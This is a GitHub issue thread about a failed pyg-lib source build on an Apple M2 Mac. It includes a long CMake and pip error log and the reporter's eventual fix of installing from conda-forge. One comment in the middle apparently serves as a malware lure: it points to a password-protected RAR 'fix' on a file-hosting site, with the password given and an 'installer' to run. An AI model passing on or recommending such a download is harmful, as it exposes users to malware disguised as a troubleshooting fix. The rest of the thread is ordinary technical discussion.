### ISSUE TITLE
Can't install pyg-lib on MacBook M2

### ISSUE THREAD

**Issue by mojtabaSefidi** [pyg-team/pyg-lib#347]
### 😵 Describe the installation problem

I tried to install pyg-lib but I got the following error. I also explored the previous issues but they couldn't solve my problem.

```
pip install git+https://github.com/pyg-team/pyg-lib.git
```

error:

```
Collecting git+https://github.com/pyg-team/pyg-lib.git
  Cloning https://github.com/pyg-team/pyg-lib.git to [/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh](https://file+.vscode-resource.vscode-cdn.net/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh)
  Running command git clone --filter=blob:none --quiet https://github.com/pyg-team/pyg-lib.git [/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh](https://file+.vscode-resource.vscode-cdn.net/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh)
  Resolved https://github.com/pyg-team/pyg-lib.git to commit fc6cdc8042f1c506bc1f143ec2a5b9364bd66390
  Running command git submodule update --init --recursive -q
  Preparing metadata (setup.py) ... Building wheels for collected packages: pyg_lib
  Building wheel for pyg_lib (setup.py) ... error: subprocess-exited-with-error
  
  × python setup.py bdist_wheel did not run successfully.
  │ exit code: 1
  ╰─> [100 lines of output]
      running bdist_wheel
      running build
      running build_py
      creating build
      creating build/lib.macosx-10.9-x86_64-cpython-310
      creating build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib
      copying pyg_lib/home.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib
      copying pyg_lib/__init__.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib
      copying pyg_lib/testing.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib
      copying pyg_lib/_triton.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib
      creating build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib/sampler
      copying pyg_lib/sampler/__init__.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib/sampler
      creating build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib/ops
      copying pyg_lib/ops/scatter_reduce.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib/ops
      copying pyg_lib/ops/__init__.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib/ops
      creating build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib/partition
      copying pyg_lib/partition/__init__.py -> build/lib.macosx-10.9-x86_64-cpython-310/pyg_lib/partition
      running build_ext
      -- The C compiler identification is Clang 14.0.6
      -- The CXX compiler identification is Clang 14.0.6
      -- Detecting C compiler ABI info
      -- Detecting C compiler ABI info - failed
      -- Check for working C compiler: [/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang)
      -- Check for working C compiler: [/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang) - broken
      CMake Error at [/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/cmake/data/share/cmake-3.30/Modules/CMakeTestCCompiler.cmake:67](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/cmake/data/share/cmake-3.30/Modules/CMakeTestCCompiler.cmake:67) (message):
        The C compiler
      
          "/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang"
      
        is not able to compile a simple test program.
      
        It fails with the following output:
      
          Change Dir: '/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh/build/temp.macosx-10.9-x86_64-cpython-310/CMakeFiles/CMakeScratch/TryCompile-n9Hw28'
      
          Run Build Command(s): [/Users/mojtaba/anaconda3/envs/pyg/bin/ninja](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/bin/ninja) -v cmTC_fc0af
          [1/2] [/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang)   -march=core2 -mtune=haswell -mssse3 -ftree-vectorize -fPIC -fPIE -fstack-protector-strong -O2 -pipe -isystem [/Users/mojtaba/anaconda3/envs/pyg/include](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/include)  -arch x86_64 -isysroot [/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk](https://file+.vscode-resource.vscode-cdn.net/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk) -MD -MT CMakeFiles/cmTC_fc0af.dir/testCCompiler.c.o -MF CMakeFiles/cmTC_fc0af.dir/testCCompiler.c.o.d -o CMakeFiles/cmTC_fc0af.dir/testCCompiler.c.o -c [/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh/build/temp.macosx-10.9-x86_64-cpython-310/CMakeFiles/CMakeScratch/TryCompile-n9Hw28/testCCompiler.c](https://file+.vscode-resource.vscode-cdn.net/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh/build/temp.macosx-10.9-x86_64-cpython-310/CMakeFiles/CMakeScratch/TryCompile-n9Hw28/testCCompiler.c)
          [2/2] : && [/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang) -march=core2 -mtune=haswell -mssse3 -ftree-vectorize -fPIC -fPIE -fstack-protector-strong -O2 -pipe -isystem [/Users/mojtaba/anaconda3/envs/pyg/include](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/include)  -arch x86_64 -isysroot [/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk](https://file+.vscode-resource.vscode-cdn.net/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk) -Wl,-search_paths_first -Wl,-headerpad_max_install_names -Wl,-pie -Wl,-headerpad_max_install_names -Wl,-dead_strip_dylibs -Wl,-rpath,/Users/mojtaba/anaconda3/envs/pyg/lib -L/Users/mojtaba/anaconda3/envs/pyg/lib CMakeFiles/cmTC_fc0af.dir/testCCompiler.c.o -o cmTC_fc0af   && :
          FAILED: cmTC_fc0af
          : && [/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/bin/x86_64-apple-darwin13.4.0-clang) -march=core2 -mtune=haswell -mssse3 -ftree-vectorize -fPIC -fPIE -fstack-protector-strong -O2 -pipe -isystem [/Users/mojtaba/anaconda3/envs/pyg/include](https://file+.vscode-resource.vscode-cdn.net/Users/mojtaba/anaconda3/envs/pyg/include)  -arch x86_64 -isysroot [/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk](https://file+.vscode-resource.vscode-cdn.net/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk) -Wl,-search_paths_first -Wl,-headerpad_max_install_names -Wl,-pie -Wl,-headerpad_max_install_names -Wl,-dead_strip_dylibs -Wl,-rpath,/Users/mojtaba/anaconda3/envs/pyg/lib -L/Users/mojtaba/anaconda3/envs/pyg/lib CMakeFiles/cmTC_fc0af.dir/testCCompiler.c.o -o cmTC_fc0af   && :
          ld: unsupported tapi file type '!tapi-tbd' in YAML file '/Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib/libSystem.tbd' for architecture x86_64
          clang-14: error: linker command failed with exit code 1 (use -v to see invocation)
          ninja: build stopped: subcommand failed.
      
      
      
      
      
        CMake will not be able to correctly generate this project.
      Call Stack (most recent call first):
        CMakeLists.txt:2 (project)
      
      
      -- Configuring incomplete, errors occurred!
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh/setup.py", line 133, in <module>
          setup(
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/__init__.py", line 104, in setup
          return distutils.core.setup(**attrs)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/core.py", line 184, in setup
          return run_commands(dist)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/core.py", line 200, in run_commands
          dist.run_commands()
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 969, in run_commands
          self.run_command(cmd)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/dist.py", line 967, in run_command
          super().run_command(command)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 988, in run_command
          cmd_obj.run()
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/wheel/bdist_wheel.py", line 368, in run
          self.run_command("build")
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/cmd.py", line 316, in run_command
          self.distribution.run_command(command)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/dist.py", line 967, in run_command
          super().run_command(command)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 988, in run_command
          cmd_obj.run()
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/command/build.py", line 132, in run
          self.run_command(cmd_name)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/cmd.py", line 316, in run_command
          self.distribution.run_command(command)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/dist.py", line 967, in run_command
          super().run_command(command)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 988, in run_command
          cmd_obj.run()
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/command/build_ext.py", line 91, in run
          _build_ext.run(self)
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/command/build_ext.py", line 359, in run
          self.build_extensions()
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/command/build_ext.py", line 479, in build_extensions
          self._build_extensions_serial()
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/setuptools/_distutils/command/build_ext.py", line 505, in _build_extensions_serial
          self.build_extension(ext)
        File "/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh/setup.py", line 84, in build_extension
          subprocess.check_call(['cmake', ext.sourcedir] + cmake_args,
        File "/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/subprocess.py", line 369, in check_call
          raise CalledProcessError(retcode, cmd)
      subprocess.CalledProcessError: Command '['cmake', '/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh', '-DBUILD_TEST=OFF', '-DBUILD_BENCHMARK=OFF', '-DUSE_PYTHON=ON', '-DWITH_CUDA=OFF', '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh/build/lib.macosx-10.9-x86_64-cpython-310', '-DCMAKE_RUNTIME_OUTPUT_DIRECTORY=/private/var/folders/sy/r66_fxq11sqdd8fjytyqz9bw0000gn/T/pip-req-build-2u3ekylh/build/lib.macosx-10.9-x86_64-cpython-310', '-DCMAKE_BUILD_TYPE=RELEASE', '-DCMAKE_PREFIX_PATH=/Users/mojtaba/anaconda3/envs/pyg/lib/python3.10/site-packages/torch/share/cmake', '-GNinja']' returned non-zero exit status 1.
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for pyg_lib
  Running setup.py clean for pyg_lib
Failed to build pyg_lib
ERROR: Could not build wheels for pyg_lib, which is required to install pyproject.toml-based projects
Note: you may need to restart the kernel to use updated packages.
```

### Environment

* `pyg-lib` version:
* PyTorch version: 2.2.0
* OS: MacOS 14.5
* Python version: 3.10.10
* CUDA/cuDNN version: NA
* How you installed PyTorch and `pyg-lib` (`conda`, `pip`, source): 
pip install git+https://github.com/pyg-team/pyg-lib.git
* Any other relevant information:
I also install Cmake but it wasn't helpful

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mojtabaSefidi** [comment]
_pyg-lib_ installed successfully on my MacBook m2 and the issue was solved by using the following in my PYG environment:

1. activate your PYG environment:
`source activate pyg`

2. install _pyg-lib_:
`conda install -c conda-forge pyg-lib`
